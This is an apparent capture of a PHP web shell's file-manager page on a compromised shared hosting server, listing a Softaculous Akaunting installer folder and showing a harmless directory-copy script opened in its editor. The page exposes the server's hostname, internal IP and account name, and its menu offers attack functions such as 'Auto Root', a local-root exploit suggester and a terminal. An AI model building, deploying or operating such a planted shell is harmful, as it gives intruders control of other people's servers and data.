Linux worldls-302.fr.planethoster.net 4.18.0-553.8.1.lve.el7h.x86_64 #1 SMP Thu Jul 4 15:19:33 UTC 2024 x86_64
LiteSpeed
Server IP : 10.185.0.203 & Your IP : 216.73.217.14
Domains :
Cant Read [ /etc/named.conf ]
User : gerathty
Terminal
Auto Root
Create File
Create Folder
Localroot Suggester
Backdoor Destroyer
Readme
/
var /
softaculous /
akaunting /
Delete
Unzip
Name
Size
Permission
Date
Action
images
[ DIR ]
drwxr-xr-x
2026-08-11 21:12
php53
[ DIR ]
drwxr-xr-x
2026-08-11 21:12
php56
[ DIR ]
drwxr-xr-x
2026-08-11 21:12
php71
[ DIR ]
drwxr-xr-x
2026-08-11 21:12
php81
[ DIR ]
drwxr-xr-x
2026-08-11 21:12
php82
[ DIR ]
drwxr-xr-x
2026-08-11 21:12
.env
727
B
-rw-r--r--
2022-06-02 07:46
akaunting.sql
77.39
KB
-rw-r--r--
2026-08-11 06:38
akaunting.zip
71.95
MB
-rw-r--r--
2026-08-11 06:38
clone.php
4.72
KB
-rw-r--r--
2026-08-11 08:12
copy_dir.php
1.33
KB
-rw-r--r--
2021-12-23 06:54
edit.php
4.39
KB
-rw-r--r--
2026-08-11 08:12
edit.xml
447
B
-rw-r--r--
2021-12-23 06:54
extend.php
9.96
KB
-rw-r--r--
2026-08-11 08:12
fileindex.php
254
B
-rw-r--r--
2025-02-17 04:42
import.php
3.53
KB
-rw-r--r--
2026-08-11 08:12
info.xml
5.31
KB
-rw-r--r--
2026-08-11 06:38
install.js
921
B
-rw-r--r--
2021-12-23 06:54
install.php
4.21
KB
-rw-r--r--
2026-08-11 08:12
install.xml
2.94
KB
-rw-r--r--
2022-06-27 08:19
md5
4.71
KB
-rw-r--r--
2026-08-11 08:12
notes.txt
722
B
-rw-r--r--
2023-10-09 06:53
update_pass.php
555
B
-rw-r--r--
2021-12-23 06:54
Save
Rename
<?php @unlink('copy_dir.php'); $src = '[[srcpath]]/storage/app/uploads'; $dst = '[[softpath]]/storage/app/uploads'; function copy_r($path, $dest){ // Is it a Directory ? if( is_dir($path) ){ // Create the Destination Dir @mkdir($dest); $stat = stat($path); // Set the mode of the destination if(!empty($stat['mode'])){ @chmod($dest, $stat['mode']); } // Set the UID if(!empty($stat['uid'])){ @chown($dest, $stat['uid']); } // Set the GID if(!empty($stat['gid'])){ @chgrp($dest, $stat['gid']); } // Start reading the current directory $objects = scandir($path); if( sizeof($objects) > 0 ){ foreach( $objects as $file ) { if( $file == "." || $file == ".." ){ continue; } // Go on copy_r( $path.'/'.$file, $dest.'/'.$file ); } } return true; }elseif( is_file($path) ){ //To exclude some files if set in script's clone.php's __pre_unzip() function $ret = copy($path, $dest); $stat = stat($path); // Set the mode of the destination if(!empty($stat['mode'])){ @chmod($dest, $stat['mode']); } // Set the UID if(!empty($stat['uid'])){ @chown($dest, $stat['uid']); } // Set the GID if(!empty($stat['gid'])){ @chgrp($dest, $stat['gid']); } return $ret; }else{ return false; } } copy_r($src, $dst);